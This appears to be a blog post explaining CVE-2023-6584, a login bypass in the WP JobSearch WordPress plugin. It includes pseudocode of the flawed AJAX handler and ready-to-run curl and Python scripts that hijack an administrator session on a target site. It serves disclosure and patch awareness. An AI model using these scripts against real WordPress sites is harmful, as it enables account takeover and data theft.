CVE-2023-6584 - How Attackers Could Hijack Any User WordPress Account via WP JobSearch Plugin (With Exploit Example)

A critical vulnerability tracked as CVE-2023-6584 was discovered in the *WP JobSearch* plugin for WordPress (all versions before 2.3.4). This security flaw allows anyone to log in to any user account—including administrators—with nothing but that user’s email address. This post will break down the vulnerability, show you a simple exploitation example, and provide links to original resources for further reading. All content is written in clear, simple language for easy understanding.

What is CVE-2023-6584?

WP JobSearch is a popular plugin used by thousands for managing job listings on WordPress sites. Versions before 2.3.4 failed to validate logins properly, making it possible for hackers to hijack any user account without knowing a password.

Impact:
- Attackers can access any account, steal personal information, deface the site, or take over the entire WordPress install.

How the Exploit Works (Technical Details)

The vulnerability is a classic case of *broken authentication*. Actually, the login process in these plugin versions only checks for a valid email and completely skips password validation in some circumstances (such as via the AJAX-based login endpoint).

Original Vulnerability Report:
- WPScan Advisory
- Wordfence Advisory
- NVD Entry on CVE-2023-6584

How Did This Happen?

A function responsible for AJAX authentication did not verify passwords. The typical flow looks like this (in pseudocode):

// Called via an AJAX endpoint (e.g., /wp-admin/admin-ajax.php?action=jobsearch_login)
function jobsearch_ajax_login($email) {
    $user = get_user_by('email', $email);
    if ($user) {
        // MISSING: password validation
        wp_set_current_user($user->ID);
        wp_set_auth_cookie($user->ID);
        return 'Login successful';
    } else {
        return 'User not found';
    }
}

Notice the missing password check? Anyone who knows your email can act as you.

Example Exploit Code (Using curl)

The bug can be exploited by making a forged AJAX request. Here’s a basic exploit using the command line with curl:

curl -X POST \
     -d "action=jobsearch_login" \
     -d "user_login=admin@example.com" \
     https://victim.com/wp-admin/admin-ajax.php

Here's a short Python snippet to automate the attack

import requests

url = 'https://victim.com/wp-admin/admin-ajax.php'
data = {
    'action': 'jobsearch_login',
    'user_login': 'admin@example.com'
}

session = requests.Session()
response = session.post(url, data=data)
print(response.text)  # See if login was successful

# Cookies in 'session' now give you admin access.

*Note: This is for educational and defense purposes only! Do not attack any system you do not own.*

Final Thoughts

CVE-2023-6584 is one of the most dangerous WordPress plugin bugs in recent years due to its simplicity and impact. If you’re running a WordPress site, you need to audit your plugins regularly and ensure they’re up to date.

Original References

- WPScan Disclosure
- Wordfence Threat Report
- NVD: CVE-2023-6584

If you found this helpful, share it and help protect the WordPress community!


*This post is for awareness and defense. Always use security knowledge ethically and responsibly.*

Timeline

Published on: 02/27/2024 09:15:37 UTC
Last modified on: 08/01/2024 13:45:47 UTC